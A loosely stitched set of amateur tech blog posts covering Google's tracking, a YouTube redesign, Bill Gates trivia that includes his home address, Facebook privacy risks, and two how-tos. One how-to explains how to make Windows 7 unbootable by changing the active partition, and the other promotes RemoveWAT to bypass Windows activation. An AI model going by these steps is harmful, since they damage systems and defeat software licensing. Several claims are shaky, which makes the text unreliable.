Similarly, this is not the first time Google’s practice to keep track of its users is under spotlight. In the past, the company has faced several lawsuits from consumers. Last year, Google paid a fine of over $22 million to the US Federal Trade Commission for ignoring the Do Not Track option enabled by users of Safari web browser.

In the last few years, the competition between Microsoft and Google has intensified. The rise in popularity of Android devices and cloud-based services like Google Docs means Google is now more than a search engine company. While Microsoft has launched direct attack on Google services with campaigns like ‘scroogled’, Google has hit back by refusing to create Gmail or Google Drive apps for Windows 8 and Windows Phone.
Actually There competition screws normal Users like us. So take Care of your Content placed inside Mails.!!

Youtube UPDATED..!!

Check the New looks of YouTube. Its Better!!

Internet search giant Google has unveiled a fresh look for its video sharing website YouTube. According to the official company’s official blog, the new design emphasizes on subscriptions and channels.

Those changes include placing the video at the top of the page, putting it front and center for the viewer, and adding elements such as subscribe, the social action options, and the video information right below the player, CNET reports.

According to the report, Playlists are on the right, and can be browsed while the video is playing. YouTube also introduced a guide that alerts users of new videos in their subscription list.

The subscriptions and guide can be found on other devices beyond the PC, including Android, iPhone, PlayStation 3, and Google TV, the report said.

BILL GATES..!!

Some fun Facts about “THE BILL GATES”

1) Bill Gates is a BORN Genius.
Born on October 28, 1955 to lawyer father and teacher mother in Seattle, Bill Gates got initiated into the computing world right in his childhood.

At the age of 13, while studying at private Lakeside School, Gates discovered his interest in software and started writing his own computer programs.
According to some reports, Bill Gates sold his first computer program at the age of 17, a time-tabling system for his high school for $4,200.


2) Bill Gates is a Hacker
Interestingly, Gates and three other high school students were banned from computer usage by Seattle-based CCC (Computer Center Corporation) after they were caught exploiting its operating system bugs to steal computer time.


3) Extremely Intelligent
According to reports, Bill Gates scored 1590 on his SAT (Scholastic Aptitude Test). The top score for the test then was 1600. He then got enrolled at Harvard College in 1973. Prior to the mid-1990s, SAT score of 1590 corresponded roughly to an IQ of 170


4) He is a college dropout
Few people know that Gates is actually a Harvard university dropout. Gates who scored 1590 on his SAT test out of 1600 got admission in Harvard University in the year 1973, after completing his high school.
At Harvard University, Gates and his high school friend Paul Allen worked on a version of the programming language BASIC for the first microcomputer — MITS Altair. Two years later in 1975, he decided to opt out of college to start Microsoft, what eventually went on to become the world’s largest software company.
5) Bill Gates Graduated in 2007, He is my Batch Mate
However, in 2007 Bill Gates finally got a degree from Harvard, when the university conferred him with an honorary degree. At Harvard, Gates met Steve Ballmer who joined Microsoft in 1980. CEO Ballmer was Microsoft’s 24th employee.
In 1975, Gates started Microsoft with friend Paul Allen from a rented accommodation in Albuquerque, New Mexico. In 1977, Gates and Allen officially registered a partnership, and Micro-soft became Microsoft.


6) Turning Point of Microsoft
The biggest breakthrough came in 1980 when Microsoft won a contract from IBM to provide operating system MS-DOS for IBM’s new personal computers.
Gates had reportedly once told his university teachers that he aims to become a millionaire by the age 30. And he missed the target by just one year. Gates became a billionaire by the age of 31.


7) Growth of Microsoft
In 1986, the year Microsoft went public with the IPO price of $21/share, Gates became a billionaire. Microsoft stock went public at $21 per share, rising to $28 per share by the end of the first trading day. Initial public offering raised roughly $61 million.
In 1992, Forbes declared Gates to be the richest man in America, worth $6.3 bn. In 1995, Gates became richest man in the world, a crown he continues to hold (he has lost the no.1 slot only once in 2008).


8) Bill gates was convicted.
The founder of world’s biggest software company has also been caught on the wrong side of the law. In 1977, Gates was arrested in New Mexico for allegedly jumping a red light and also driving without a license. (The photo on the left is a mug shot of Gates in police custody).


9) Got married on New Year’s Day
Bill Gates married long-time girlfriend Melinda French in Hawaii on January 1st, 1994. They have three children. Gates is an avid reader, and enjoys playing golf and bridge. In wealthiest list for 17 years in a row Software King Bill Gates has figured in the Forbes 400 list of the wealthiest people in the world for 17 years in a row, from 1993 to 2009. For a brief period in 1999, his net worth went past $100 billion, and new term “cent billionaire” was coined.

In 2008, Gates was dethroned as the richest man by America’s investment Moghul by Warren Buffett whose fortune swelled to an estimated $62 billion, up $10 billion from a year ago. The same year Gates was at no. 3 with fortune of $58 billion. At no. 2 was the Mexican telecom tycoon Carlos Slim, with an estimated net worth of $60 billion.

However, the year 2009 returned Gates his numero uno spot in the Forbes’ The World’s billionaires list. With a net worth of $40 billion, Gates regained his position as the world’s wealthiest from investor Warren Buffett. However, the deepening economic crisis eroded Gates fortune too. Gates lost approximately $18 billion in 2008.


10) Rich People Cannot Predict
If you thought all that Bill Gates ever said was profound, you need to read some of his way off the mark predictions. In 2004, Gates predicted that the problem of spam e-mail messages will be gone within two years. And it’s anyone’s guess how true the prediction has turned out to be.
Similarly, in 1981 Gates reportedly said that nobody would ever need more than 640 kilobytes of memory on their personal computer. Here too Gates went way off the mark, with most PCs today offering at least 2GB of memory.

The tech czar had also said that Microsoft “will never make a 32-bit operating system.” However, in 1992, Microsoft released beta of its first 32 bit Windows NT. NT was the first full 32-bit version of Windows.


11) His Mansion is Heaven
Bill Gates lives in 66,000 square feet situated on the edge of lake Washington. The address is 1835 73rd Ave NE, Medina, WA 98039.
The house is famous for its design and the technology it incorporates. Gates reportedly purchased several pieces of land and houses and built this house adjoining all those. Much of the house is built underground into the hill, so the house looks smaller than it actually is.

The house built in the Pacific lodge style has many marvels including the 17-by-60-foot swimming pool has an underwater music system and a floor painted in a fossil motif. Swimmers can dive under a glass wall and emerge outdoors by a terrace.

Then there’s ornate, paneled library with a domed reading room with oculus (light well), fireplace, and two secret pivoting bookcases, one containing a bar.

HATS OFF to his Achievements.

Dangerous Facebook

5 Hidden dangers of Facebook

Over the last few years, Facebook’s growth has been phenomenal. The world’s no. 1 social networking site also sometime back beat Google to become the most visited Web site in the US for an entire week at a stretch. However, the site has also lately being receiving lot of flak for its privacy policies.

An expert in online privacy drew attention to the five dangers of sharing information on social networking site Facebook. Joan Goodchild, senior editor of CSO (Chief Security Officer) Online, said that marketing efforts by the company often results in a compromise on account holders’ privacy.


Risk 1: Your information is being shared with third parties

According to Facebook policy last updated on April 2010, “When you connect with an application or website it will have access to General Information about you. The term General Information includes your and your friends’ names, profile pictures, gender, user IDs, connections, and any content shared using the Everyone privacy setting. … The default privacy setting for certain types of information you post on Facebook is set to “everyone.” … Because it takes two to connect, your privacy settings only control who can see the connection on your profile page. If you are uncomfortable with the connection being publicly available, you should consider removing (or not making) the connection.


Risk 2: Privacy settings revert to a less safe default mode after each redesign
In March, private e-mail according to a Gawker report, private email addresses that many Facebook users wanted to keep hidden were revealed publicly on a multitude of Facebook profiles. The glitch was later resolved by Facebook.


Risk 3: Facebook ads may contain malware
Recently, a Facebook event invitation was reportedly sent to some over 2,300 friends of Jim Breyer, Accel Partners venture capitalist who sits on Facebook’s board of directors, asking “Would you like a Facebook phone number?” However, the message was actually a scam and the users who entered their passwords in response to the message in turn sent the whole thing to their friends lists too.

“This was a phishing scam and Jim’s account appears to have been compromised,” read a statement from Facebook as provided to venture industry news site PEHub.

 
Risk 4: Your friends unknowingly make you vulnerable
On May 6th, the popular social network patched a major security bug that allowed users to snoop on their friends’ private chats, and view their pending friend requests. The exploit forced Facebook to temporarily disable chat.


Risk 5: Scammers are create fake profiles
Earlier this week, 15 privacy and consumer protection organizations filed a complaint with the Federal Trade Commission, alleging that the site manipulates privacy settings to make users’ personal information available for commercial use.

 

CRASH Windows7..!!!!

Virus!! Windows 7 is Vulnerable!! CRASH!!

 

Trust me, Its easier to Crash windows 7 in comparison to windows XP.

You just have to change some Setting and BOOOM!!!

Try it…

Right Click on My Computers > goto Manage > Disk Management.

You will notice there that there is a hidden Drive of 100 MB with the Name “system Reserved”. this is the partion with all the boot files(Security Bought into windows 7 from windows XP). Microsoft had a thought, that if we cannot access the computer, we cannot delete the file and computer is secure, and Thats True.

So now what you will see is that “System Reserved” Drive is an ACTIVE partition.

Active patition means, the Drive computer will check while booting the System. So now what we will do is, Change the active partition to c: drive

To change the active partition: Right Click on c: > MARK PARTITION AS ACTIVE.

BINGO!!!

Windows are gone with wind. Restart the computer and Just Check.

Windows are too Vulnerable..!!!.!!

Note:
1) Don’t Try it on your own Computers, Try it in Virtual machines.

Disclaimer: Anybody here associated with it, is not responsible for any Kind of Loss or damage to any intellectual or Physical Property due to above post. It is solely for Educational purpose.

Windows 7 Genuine

Make your Windows 7 Genuine!! (Remove Windows Genuine counterfeiting)

 

My next tutorial will help the personal users who use windows 7, and got the error of Windows Genuine counterfeiting.
Its very easy to do. Download RemoveWAT22.zip from here and use it.
 (Download from HERE or HERE )


Explanation:

Windows 7 got a file with the Name WAT(Windows Activation tool) in c:\windows\system32\wat.
This tool will remove that file and your computer will have Full version of windows 7.
Difference Between Normal Windows and Windows without WAT

Precautions:
1) Make Sure you are Dis-connected to Internet.
2) Once you will use RemoveWAT22, Don’t ever update windows.
3) Switch off windows updates from computers > properties.

I personally DO NOT Like Piracy, use Genuine Softwares, But make sure they ain’t vulnerable to Viruses  
Thats why I Use Ubuntu, No Tentions of Piracy. Use open source OS like Ubuntu, back-track, fedora or My OS(Will upload soon)


Disclaimer: Anybody here associated with it, is not responsible for any Kind of Loss or damage to any intellectual or Physical Property due to above post. It is solely for Educational purpose.